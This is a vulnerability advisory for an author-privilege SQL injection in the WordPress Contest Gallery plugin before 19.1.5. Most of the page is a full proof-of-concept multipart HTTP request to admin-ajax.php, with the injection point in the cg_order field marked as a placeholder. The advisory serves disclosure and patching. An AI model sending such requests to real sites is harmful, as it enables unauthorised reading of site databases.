Contest Gallery < 19.1.5 - Author+ SQL Injection

2022-12-0500:00:00

Daniel Krohmer

localhost

sql injection

form data

security vulnerability

wordpress

xmlhttprequest

multipart/form-data

EPSS

0.001

Percentile

36.8%

JSON

The plugins do not escape the cg_order POST parameter before concatenating it to an SQL query in order-custom-fields-with-and-without-search.php. This may allow malicious users with at least author privilege to leak sensitive information from the site’s database.

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------165946102935726109082974098673
Content-Length: 2147
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=pegasus%7C1669114555%7CICoJ8dLAYWL8f1mNurYEUJKz80G5qsAs9QUHANu7Y6P%7C8d38932578430fa522ce64ed0143d8be7054cdb5b40694aecf1402276b84f91c; wp-settings-time-2=1668942221; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=pegasus%7C1669114555%7CICoJ8dLAYWL8f1mNurYEUJKz80G5qsAs9QUHANu7Y6P%7Ce49a6e0384972bf193b755ee522182a7075ecf477f3c7a236f7fd32cac02e245
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cgGalleryFormSubmit"

1
-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="action"

post_cg_gallery_view_control_backend
-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cgGalleryHash"

da8ea8d5d1357ad6772b3fc38178023a
-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cg_id"

1
-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cg_start"


-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cg_step"

10
-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cg_order"

cg_input_for_id_/**/inject-here/**/
-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cgVersionScripts"

19.1.4.1
-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cg_search"


-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cg_email[2]"

[email protected]
-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cg_image_name[2]"

jpg-vector-icon-png_287422
-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cg_email[1]"

[email protected]
-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cg_image_name[1]"

contest-gallery_13_step-11
-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="chooseAction1"

1
-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cgBackendHash"

c5df761d52dd842d7a3b5ed58a78774d
-----------------------------165946102935726109082974098673
Content-Disposition: form-data; name="cgIsRealFormSubmit"

true
-----------------------------165946102935726109082974098673--

References

bulletin.iese.de/post/contest-gallery_19-1-4-1_17

EPSS

0.001

Percentile

36.8%

JSON

Related for WPEX-ID:857ABA7D-FCCD-4672-B734-AB228440DCC0